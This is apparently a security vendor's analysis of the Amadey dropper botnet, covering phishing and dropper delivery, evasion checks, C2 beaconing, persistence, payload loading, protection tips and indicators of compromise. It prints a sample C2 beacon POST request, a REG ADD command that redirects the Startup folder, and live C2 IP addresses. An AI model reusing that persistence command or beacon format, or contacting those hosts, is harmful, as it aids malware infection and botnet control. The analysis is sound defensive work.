Gridinsoft Logo

Amadey Threat Analysis

Amadey is a sneaky dropper malware that creates extensive malware delivering botnets.

You may be interested in taking a look at our other antivirus tools:
Trojan Killer, and Online Virus Scanner.

Amadey Malware | Gridinsoft

What is Amadey Bot Malware?

September 21, 2024

Among malware, there are widely-known samples that are led by broadly-known hackers, as well as eminence grises. The latter do not appear much, but are still very important to make other things function. Amadey is one of them – a sneaky dropper that is known quite moderately, but participates in numerous large malware spreading campaigns.

Amadey Trojan is a classic example of a dropper malware, that aims at maintaining the stealth presence in the system and providing the ability to load (“drop”) any other malicious item into this system. A distinctive feature of modern droppers (and Amadey in particular) is the ability to unite infected systems into a centrally controlled network. A single command may corrupt hundreds and thousands of computers with a wide range of different malware.

Received Amadey samples

First appearance of this malware was recorded in 2018, and since then its masters have been cooperating with numerous threat actors. The most known names among them are the LockBit gang, TA505, TA406 and TA511. The botnet also took part in spreading FlawedAmmyy RAT – infected machines were sending spam that contained this remote access trojan. Malware itself often used other droppers to propagate itself to other devices – an often tactic used by cybercrime gangs and threat actors who purchase access to the entire network.

Delivery

As we mentioned just above, Amadey trojan often uses other droppers to propagate itself. However, alpha and omega of all modern malware distributions – phishing email letters – are not disdained as well. Moreover, malware is theoretically capable of spreading itself in a worm-like manner – by sending spam emails to other people using the victims’ accounts.

Dropped by other malware

Dropper malware, also known as malware downloaders, allow delivering not only ordinary malware, but also other droppers. Such a function is often opted by cybercriminal gangs who have their payload deployment set up for the one particular dropper they use, thus a third-party one will not fit them. After loading their "convenient" dropper, they start action as if they manually gained initial access. Actually, any dropper may deliver another one, and Amadey may bring some other stuff, like SmokeLoader or Cobalt Strike beacon. Amadey, on the other hand, relies on Rig and Fallout EKs, and was also spotted in cooperation with AZORult stealer.

From a certain point of view, third-party droppers are easier to use for malware deployment. They are often able to run malware right away, without resorting to the use of their own loaders. Droppers that come first may also take care of the target’s security system, which eases the overall process even more. However, such networks may be used by numerous threat actors at the same moment, which absolutely shreds the value of any exfiltrated data.

Email spam

Obviously, the sheer amount of email spam as well as their variety is overwhelmingly big these days. Finding all of them and understanding how they work is pretty challenging, however, some examples are even harder to get along with. Spear phishing, specifically the one that uses hijacked accounts and detailed information about the target, sometimes has comparable efficiency with insider threats. Amadey trojan takes advantage of such a sophisticated method, using it for both initial spreading and self-propagation. The latter is done by grabbing the MS Outlook contact book (if the one is present in the system) and sending them all spam emails pretending to be the system owner.

Typical example of the phishing messages on the email
Typical example of the phishing messages on the email

The exact payload in this case hides within an attached document – typically a Microsoft Office one or any other that can carry a script inside. Message text pushes the victim to open the attachment, finding a pretty convincing explanation for that action. Once run, the script connects to the command server, receives the payload and launches it.

Amadey Malware Analysis

Most of the time, Amadey aims at single users rather than corporate networks, thus the need for sturdy anti-detection measures is much lower. For that reason, the only consistently-applied measure this malware uses to prevent the detection is base64 encoding. Additionally, threat actors change the sample packing for each campaign, making it nearly impossible to apply static analysis for threat detection. Shuffling the file sections changes the hashes and cancels any file structure-based detection rules built for a previous sample – and that allows it to remain stealthy for some time.

C2 URL decoding
Rows that are responsible for C2 address decoding

Other anti-detection measures include checking the anti-malware programs present in the system. It checks if the system has one or several from an array, and alters its behaviour depending on which one was located. Actually, those changes are dictated by the behaviour of security software – they generally check certain directories and/or registry keys. To avoid detection, for example, by Sophos or Norton, Amadey will change the directory it will drop its static files to – from ProgramData to a different one. The trick with the registry key we described below is not done if malware detects a 360TotalSecurity running.

  • Comodo
  • AVG
  • Panda Security
  • Avast
  • Kaspersky
  • Sophos
  • ESET
  • Dr.Web
  • BitDefender
  • 360TotalSecurity
  • Norton
  • Avira

Commonly to a large number of Russia-originated malware, the article subject checks if the computer is in Russia. If so, malware will cease further execution. In the control panel, crooks may add the avoid list of countries they want, still, ban for Russian IPs is hard-coded and could not be removed.

IP checkup Amadey
Amadey specifically avoids infecting systems in Russia.

Once that checkup is passed, Amadey starts with gathering some of the basic system information. This data is too scarce to qualify it as the attempt to spy on the system, so this collection is most probably to fingerprint the system. After getting the information, the dropper tries to connect to the C&C server with a normal HTTP POST request. The request contains the following rows:

POST /games/category/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31[.]41[.]244[.]200
Content-Length: 83
Cache-Control: no-cache

id=152140224449&vs=2.11&sd=c5c741&os=11&bi=1&ar=1&pc=WIN10X64&un=evaluser&dm=&av=0&lv=0

The bottom row contains what appears to be the information about the system. Id and vs parameters most probably correspond to the bot ID and malware version. ID is generated randomly for each infected machine. It is hard to say what the sd parameter stands for, but os apparently means OS version (11 for Windows 10). Value bi stands for the system architecture (0 for x32 and 1 for x64); ar points at administrator privileges upon the attacked account. It is quite understandable that pc=WIN7X64 is a blob of data about the PC name and architecture, un stands for username, and the value in front of av displays if there are any anti-malware programs running in the system. The lv value, at the end of a row, is a pointer if the system is ready to get additional malware. Malware keeps sending the POST request to the server each 60 seconds.

Persistency gain

Shortly after the first contact to the command and control, Amadey starts gaining persistence in the system. First of all, it drops its copy to a randomly-named folder (mash of 10 letters and numbers) in the ProgramData directory. The executable file is named in the same manner – 5 random numbers. Once done, malware performs a PowerShell command to switch the registry key path that is responsible for current user autorun to the folder created a moment ago. The command looks like the following:

REG ADD \”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\” /f /v Startup /t REG SZ /d C:\\ProgramData\%folder_name%

Further actions & Malware Delivery

Once malware is ready to function, it notifies the server with changing the lv value from 1 to 0 in the POST request. After that, C2 returns the malware the list of servers where it can get the payload(s) – if there is one to spread. Payloads may have any possible form, but usually those are DLL files that are getting downloaded to the folder where Amadey sits. To fetch them up, the dropper calls the rundll32.exe to run the downloaded libs. At this point, the functions related to Amadey Dropper end up, as all further operations are done by the delivered malware samples.

Association with other malware

According to the data from online sandboxes and malware collections, Amadey heavily cooperates with RedLine spyware, as of March 2023. Slightly less often cases of joint action are related to SmokeLoader backdoor and Vidar Stealer. STOP/Djvu ransomware, the long-timer and dominant ransomware family in single-user attacks, uses Amadey delivery services as well. Still, aside from pretty wide-known names, this dropper serves some less notable things as well. Ones are Pseudomanuscrypt spyware and Laplas clipper (clipboard stealer). The latter, however, generally relies upon a different spreading way rather than Amadey’s botnet.

C2 toolkit

Interestingly enough, Amadey has its C2 panel’s source code was available for everyone on GitHub some time ago. It is not clear whether it was published by a dissatisfied member of a hacker group or the security researcher(s) who managed to leak it somehow. Panel features 2 modes: observer, with limited privileges and without the ability to impact bots functionality, and root – the one which can do everything. Admin panel gives a view upon what is happening within the botnet.

Amadey C2 panel
Main page of the Amadey botnet's control panel

It offers sorting the system by their properties, such as OS version, architecture, last time online, malware version and so on.

Amadey C2 panel sorting

Settings tab allows you to manage malware properties and tasks. In particular, malware master can change primary C2 URL, add certain countries to avoid and modify the type of the file the payload will have. Overall, there is nothing special about this panel functionality, as most of the functionality is pretty much the same as in any other botnet admin panel.

Amadey C2 panel taks

Protection against Amadey Trojan

As Amadey generally aims for sole users and features corresponding detection evasion methods, passive counteraction will not be complicated. Active one though supposes being as attentive as possible – since inattentiveness is what hackers hope for when spreading this malware. It is especially needed since threat actors that spread Amadey often fall into using spear phishing and other pretty convincing tricks. Passive measure includes being capable of detecting and removing the threat even if it made it to your system. Another side of a problem is the prevention of the use of other droppers that may deliver the article subject. Fortunately, we worked out answers for each case scenario.

  • Be careful with emails you receive. Despite the ongoing reign of email spam as a malware-spreading method, folks retain trust in pretty much any email they receive. That is about to be corrected, and the only way is to acknowledge how to distinguish a spam email from a genuine one. The preventive measure there, obviously, is untrusting any received email and avoiding interaction with its contents unless you are sure it is safe. It may be both a link, or an attached file – they may carry equivalent danger. This advice is effective against Amadey as well as any other malware.
  • There are two things you should pay increased attention to. First one is the message body, exactly, how does it name you. Regular mailings will generally try to personalise the message by adding your name or nickname. Hackers, on the other hand, are barely able to get your correct name, and will instead use depersonalised appeals like “Dear customer” or use your email instead of name. Another thing to pay attention to is the sender's email address. It is impossible for crooks to copy the original address of a company they mimic, so at their best it will look like a crippled parody. Still, a more common case is the use of hijacked emails of other victims, which do not even try to resemble the company.
  • Avoid using pirated software. Over the last time, the share of pirated software usage for malware distribution plummeted, but that does not mean it is used less often. Threat actors that aim at single users still appreciate this method, as it provides relatively cheap and effortless spreading, and has pretty much the same efficiency. Small and sneaky dropper may be packed into the installation file, and be run together with the actual program. Victim will not even suspect anything until the anti-malware program will alarm, or some of the malware delivered by the dropper will not disrupt the workflow. The similar type of software – keygens, cheat engines and so on – may carry the same danger. They are not legal as well, and their creators seek for monetisation in any possible way.
  • Use decent anti-malware software. Modern threats are quite hard to detect, even ones that do not feature complicated stuff like section encryption, dynamic API resolution or normal workflow imitation. To detect and prevent such things, an advanced solution is needed – the one which will spot malware by its behaviour aside from the signature. GridinSoft Anti-Malware is what can effectively fulfil that need, providing detection with 3 separate scanning systems. Heuristics and neural networks will easily detect things that are missed by signature-based detection.

Amadey Malware IoCs

Trojan.Win32.Amadey.tr28c789c3953a7383ef6d9876e2aaf5bb91393b0be4b8c8919845a2428920e751
Trojan.Amadey.65344.dd!yfbef6710dbe58cb2a400e94e471509b8bb3605ef74ba6c177f9744254ab2278e3
Trojan.Win32.Amadey.tr7b4dc90b59760320253596a753556de932a32fd1967726b7321a0095760f7bcf
Trojan.Win32.Amadey.tr6f31b1b2b0f080c1569d5dfb2840244be2c8ef84824b0fecf686c6e42def3aa7
Trojan.U.Amadey.tr2cdda26cc29f1ab91873bf2de8af2627aa7fa73002cb490f2f1ab73ff824ebf8
Trojan.Win32.Amadey.tr1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922
Trojan.Win32.Amadey.tr5ec0957697ef3692607bc8a8d00bdad0ff86c129ead5fb698c035f4d6b47c69c
Trojan.Win32.Amadey.botd9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
Trojan.Win32.Amadey.bot362d8f8fcc698554a750a5dfb1e261eb3b5442fb4bfe4746c8ba9431ec944305
Trojan.Win32.Amadey.bot89514d80ee5134e867e90052275abdd3e78cd50bf3c593784c73ef3f95cb94b7

С2 IP addresses

  • 193.233.20.26
  • 193.233.20.27:4123
  • 193.56.146.218
  • 193.233.20.25
  • 31.41.244.200

Important Note: Amadey is likely run by a homogenous group of cybercriminals, thus the list of C2 addresses is not very extensive. Each of the addresses has a huge volume of malware connections.

Mitre ATT&CK Indicators

Indicator ID Name Indicator ID Name
T1071 Application Layer Protocol: Web Protocols T1547 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1005 Data from Local System T1140 Deobfuscate/Decode Files or Information
T1568 Dynamic Resolution: Fast Flux DNS T1041 Exfiltration Over C2 Channel
T1083 File and Directory Discovery T1105 Ingress Tool Transfer
T1112 Modify Registry T1106 Native API
T1027 Obfuscated Files or Information T1518 Software Discovery: Security Software Discovery
T1553 Subvert Trust Controls: Mark-of-the-Web Bypass T1082 System Information Discovery
T1614 System Location Discovery T1016 System Network Configuration Discovery
T1033 System Owner/User Discovery